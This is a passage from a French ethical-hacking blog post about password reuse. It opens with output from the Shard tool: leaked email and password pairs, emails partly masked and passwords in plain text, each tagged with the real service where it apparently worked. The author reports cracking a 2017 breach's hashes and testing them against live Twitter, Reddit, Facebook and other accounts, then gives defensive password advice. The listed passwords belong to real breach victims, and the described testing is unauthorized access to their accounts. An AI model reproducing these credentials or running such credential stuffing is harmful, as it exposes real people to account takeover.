[+] *******@gmail.com:joshuavi - Kijiji
[+] *******@cox.net:damnkids - BitBucket
[+] *******@hotmail.com:1kolort2 - BitBucket
[+] *******@live.com:roblox12 - Twitter, BitBucket
[+] *******@gmail.com:azerty00 - Twitter
[+] *******@gmail.com:apache7076 - Twitter
[+] *******@inmyd.ru:2wbJx11zaW - BitBucket
[+] *******@aim.com:thisisme - BitBucket
[+] *******@gmail.com:dacheng198 - BitBucket
[+] *******@GMAIL.COM:BASSETT92 - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@hotmail.com:syndrom02 - Twitter, BitBucket
[+] *******@gmail.com:bronco999 - BitBucket
[+] *******@hotmail.com:metallica4224 - Twitter
[+] *******@gmail.com:rawtheme22 - Twitter
[+] *******@gmail.com:sobaked123 - BitBucket
[+] *******@gmail.com:Thee1234 - BitBucket
[+] *******@hotmail.ca:0230176 - BitBucket
[+] *******@gmail.com:19722791 - BitBucket
[+] *******@gmail.com:indonesia2016 - BitBucket
[+] *******@live.co.uk:01cs653 - Facebook, BitBucket
[+] *******@gmail.com:Battlefield710 - Twitter, BitBucket
[+] *******@gmail.com:Supaman1 - Facebook
[+] *******@hotmail.com:Bigdick*12 - BitBucket
[+] *******@outlook.com:darkstar1 - BitBucket
[+] *******@web.de:gt9800 - BitBucket
[+] *******@yahoo.com:mvp123 - Twitter
[+] *******@yahoo.com:arturi09 - BitBucket
[+] *******@gmail.com:092486 - BitBucket
[+] *******@hotmail.com:sappeps12345 - BitBucket
[+] *******@yahoo.com:1morerep - Twitter, BitBucket
[+] *******@cox.net:joiedevivre - BitBucket
[+] *******@gmail.com:23vec4rPcC - BitBucket

Après avoir exécuté la commande Shard, un total de 219 comptes Twitter, Facebook, BitBucket et Kijiji ont été signalés comme utilisant exactement les mêmes combinaisons nom d’utilisateur: mot de passe. Fait intéressant, il n’y a pas eu de détections Reddit cette fois.

Les résultats de Shard ont déterminé que 166 comptes BitBucket ont été compromis à l’aide de cette attaque de réutilisation de mot de passe, ce qui est incompatible avec la détection BitBucket de Credmap de 111 comptes. Crepmap et Shard n’ont pas été mis à jour depuis 2016 et je soupçonne que les résultats de BitBucket sont pour la plupart (sinon entièrement) des faux positifs. Il est possible que BitBucket ait modifié ses paramètres de connexion depuis 2016 et ait annulé la capacité de Credmap et Shard à détecter une tentative de connexion vérifiée.

Les pirates motivés peuvent déchiffrer encore plus de mots de passe

Au total (en omettant les données BitBucket), les comptes compromis se composaient de 61 comptes Twitter, 52 de Reddit, 17 de Facebook, 29 de Scribd, 23 de Microsoft et une poignée de Foursquare, Wunderlist et Kijiji. Environ 200 comptes en ligne ont été compromis à la suite d’une petite violation de données en 2017.

Et gardez à l’esprit que ni Credmap ni Shard ne vérifient la réutilisation des mots de passe sur Gmail, Netflix, iCloud, des sites Web bancaires ou des sites Web plus petits qui contiennent probablement des informations personnelles comme BestBuy , Macy’s et les compagnies aériennes.

Si les détections Credmap et Shard étaient mises à jour, et si j’avais consacré plus de temps à casser les 57% de hachages restants, les résultats seraient plus élevés. Avec très peu d’efforts et de temps, un attaquant est capable de compromettre des centaines de comptes en ligne en utilisant juste une petite violation de données composée de 1 100 adresses e-mail et de mots de passe hachés.

Un attaquant motivé avec 8 millions ou 26 millions d’ ensembles de données uniques serait en mesure de provoquer des destructions majeures sur des milliers de comptes en ligne.

N’ignorez pas les violations de données …

Si vous ne voulez pas que vos noms d’utilisateur et mots de passe apparaissent dans l’une de ces bases de données divulguées, vous pouvez faire certaines choses évidentes:

  • Changez vos mots de passe. Maintenant. Et les rendre forts . Utilisez un gestionnaire de mots de passe approprié comme KeePassX ou LastPass pour stocker toutes vos données sensibles. Prenez un après-midi et réinitialisez tous vos mots de passe, même les petits comptes de jeu auxquels vous avez oublié de vous être inscrit.
  • Faites attention . Restez au courant des violations de données lorsqu’elles se produisent. Il existe de nombreux organes d’information réputés qui fournissent des informations sur les hackers au fur et à mesure.
  • Réagissez . Lorsque des violations de données se produisent, ne les ignorez pas. Si vous avez déjà été affilié au site Web affecté par une violation, modifiez votre mot de passe immédiatement. Si vous n’utilisez plus le compte ou n’en avez pas absolument besoin, supprimez-le. Ne pensez pas qu’un site Web est trop petit pour être compromis. Un pirate informatique peut facilement passer d’un petit compte à votre adresse e-mail principale. C’est possible.

 Et comme toujours, laissez un commentaire ci-dessous ou envoyez-moi un message si vous avez des questions.

Admin bar avatar
http://hackingtutoriels.com
Hacking Tutoriels est un blog professionnel ouvert à toute personne désireuse d'apprendre le Hacking Ethique par des cours et tutoriels de qualités régulièrement mis à jour. Tous les cours et tutoriels sont dispensé à but éducatif. L'utiliser à d'autres fin non-légale est de la responsabilité de l’Étudiant

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*
*